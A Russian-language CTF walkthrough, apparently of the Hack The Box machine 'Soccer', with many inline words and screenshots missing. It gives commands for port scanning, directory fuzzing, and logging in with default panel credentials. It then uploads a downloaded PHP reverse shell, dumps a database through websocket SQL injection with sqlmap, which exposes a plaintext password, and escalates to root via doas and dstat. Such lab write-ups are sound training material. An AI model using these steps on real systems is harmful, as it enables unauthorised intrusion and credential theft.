Приветствую,
! Сегодня пройдём
- лёгкую линуксовую машину с площадки
. Приятного чтения, друзья
Разведка
Начинаем, как всегда со сканирования портов, используем флаг
, чтобы использовать стандартные скрипты,
, чтобы определить сервисы открытых портов:
Bash:
Код:
nmap -sC -sV
10.10
.11.194 -oN nmap.out
Bash:
Код:
PORT STATE SERVICE VERSION
22
/tcp
open
ssh
OpenSSH
8
.2p1 Ubuntu 4ubuntu0.5
(
Ubuntu Linux
;
protocol
2.0
)
|
ssh-hostkey:
|
3072
ad0d84a3fdcc98a478fef94915dae16d
(
RSA
)
|
256
dfd6a39f68269dfc7c6a0c29e961f00c
(
ECDSA
)
|
_
256
5797565def793c2fcbdb35fff17c615c
(
ED25519
)
80
/tcp
open
http nginx
1.18
.0
(
Ubuntu
)
|
_http-title: Did not follow redirect to http://soccer.htb/
|
http-server-header: nginx/1.18.0
(
Ubuntu
)
9091
/tcp
open
xmltec-xmlmail?
|
fingerprint-strings:
|
DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix:
|
HTTP/1.1
400
Bad Request
|
Connection: close
|
GetRequest:
|
HTTP/1.1
404
Not Found
|
Content-Security-Policy: default-src
'none'
|
X-Content-Type-Options: nosniff
|
Content-Type: text/html
;
charset
=
utf-8
|
Content-Length:
139
|
Date: Fri,
23
Jun
2023
10
:33:35 GMT
|
Connection: close
|
|
|
|
|
Error
|
|
|
Cannot GET /
|
|
|
HTTPOptions:
|
HTTP/1.1
404
Not Found
|
Content-Security-Policy: default-src
'none'
|
X-Content-Type-Options: nosniff
|
Content-Type: text/html
;
charset
=
utf-8
|
Content-Length:
143
|
Date: Fri,
23
Jun
2023
10
:33:35 GMT
|
Connection: close
|
|
|
|
|
Error
|
|
|
Cannot OPTIONS /
|
|
|
RTSPRequest:
|
HTTP/1.1
404
Not Found
|
Content-Security-Policy: default-src
'none'
|
X-Content-Type-Options: nosniff
|
Content-Type: text/html
;
charset
=
utf-8
|
Content-Length:
143
|
Date: Fri,
23
Jun
2023
10
:33:36 GMT
|
Connection: close
|
|
|
|
|
Error
|
|
|
Cannot OPTIONS /
|
|
У нас есть три открытых
-порта:
,
и
. Начнём с
-го:
При переходе на
нас сразу же перенаправляет на
. В таком случае следует внести
-адрес и домен в файл
. Сделать это можно вот таким вот образом:
Теперь мы можем попасть на домен:
На сайте я ничего интересного не обнаружил, поэтому решил профаззить каталоги и файлы:
Bash:
Код:
gobuster
dir
-w /opt/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://soccer.htb/ -t
25
-x txt,html
Нашлась директория
. Давайте посмотрим что в ней:
Тут нас приветствует
. Всегда, когда обнаруживаете подобные панели - сразу же ищите стандартные данные от них. Такие мисконфиги очень популярны в
:
В данном случае стандартное имя пользователя для админа это
, а пароль
. Для пользователя это
и
.
Пробуем войти от лица администратора:
Взятие www-data
Теперь у нас есть доступ к файловому менеджеру. Через него мы можем загрузить вредоносный
-файл и получить реверс шелл.
Для начала скачаем на нашу машину следующий файл - https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php:
Bash:
Код:
wget
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Это готовый реверс шелл, который был написан на
. Теперь отредактируем его - в
нам нужно вставить наш
-адрес в
-сети, а в
, соответственно, порт:
Теперь ставим листенер на порт, который мы указали в
-файле:
Сразу же в каталог, в котором мы оказались изначально, загрузить файл не получилось, поэтому переходим в
:
Затем в
:
И нажимаем кнопку
:
Прожимаем область с текстом
Код:
“Drop files here to upload”
и выбираем
Код:
php-reverse-shell.php
:
Файл загружен, теперь нужно заставить веб-сервер запустить
-код, который расположен в нём:
Нажимаем на
Код:
“php-reverse-shell.php”
, а затем на кнопку
:
И получаем сессию от лица пользователя веб-сервера
:
Стабилизируем оболочку с помощью
:
Bash:
Код:
python3 -c ‘import pty
;
pty.spawn
(
”/bin/bash”
)
;
’
Взятие пользователя
К сожалению, на машине повысить привилегии в данном случае не получилось. Но мы можем обнаружить следующий конфигурационный файл
, где есть поддомен
Код:
soc-player.soccer.htb
:
Вносим его в
и переходим на
Код:
soc-player.soccer.htb
:
Тут мы можем посмотреть матчи, авторизоваться и зарегистрироваться. Для начала выполним последнее:
Теперь авторизуемся:
Отлично. Тут написано, что
нашего билета равен
. Похоже, что тут есть какое-то обращение к базе данных:
Попробуем ввести в форму
:
Отправляем запрос и получаем
:
То есть данный сервис проверяет валидность нашего билета по
через базу данных. Попробуем проэксплуатировать
-инъекцию:
- наш тикет существует
Посмотрим исходный
-код страницы:
Запросы идут через веб-сокеты и
порт, который был в сканировании
. В таком случае мы можем попробовать использовать
, который поддерживает веб-сокеты, чтобы вытащить нужные нам данные из базы данных. Для начала посмотрим какие есть базы данных с помощью опции
:
Bash:
Код:
sqlmap -u
"ws://soc-player.soccer.htb:9091"
--level
5
--risk
3
--data
'{"id": "*"}'
--dbs --batch --technique
=
B --threads
10
,
,
и
база данных - генерируются автоматически. Следовательно, нам нужна
: используем опцию
, чтобы указать название БД и
. чтобы получить из неё таблицы с данными:
Bash:
Код:
sqlmap -u
"ws://soc-player.soccer.htb:9091"
--level
5
--risk
3
--data
'{"id": "*"}'
--dbs --batch --technique
=
B --threads
10
-D soccer_db --dump
Самое интересное это:
Код:
Код:
player@player.htb
PlayerOftheMatch2022
Эти данные могут подойти для пользователя
. Попробуем подключиться по
:
Взятие рута
Скачем программу
с нашего хоста в каталог
на удалённую машину (про
и то, как это делается я рассказывал в прошлых прохождениях):
Даём права на запуск (
) и запускаем. Во вкладке с “интересными” правами мы можем увидеть
с
-битом:
, как и
позволяет запускать приложения от имени других пользователей. Настроить
можно через
(https://wiki.archlinux.org/title/Doas_(Русский)):
Ищем конфиг с помощью
и видим, что мы можем запускать
с привилегиями суперпользователя. Проверяем:
Запуск
через
работает, отлично. Теперь заглянем на
(dstat | GTFOBins) - как можно повысить привилегии, если мы можем запускать
с правами суперпользователя:
Нам нужна вкладка
. И просто повторяем эти две строки:
Рут получен.
Огромное спасибо, что дочитали статью до конца. Если есть какие-то ошибки/неточности, то, пожалуйста, напишите об этом в комментариях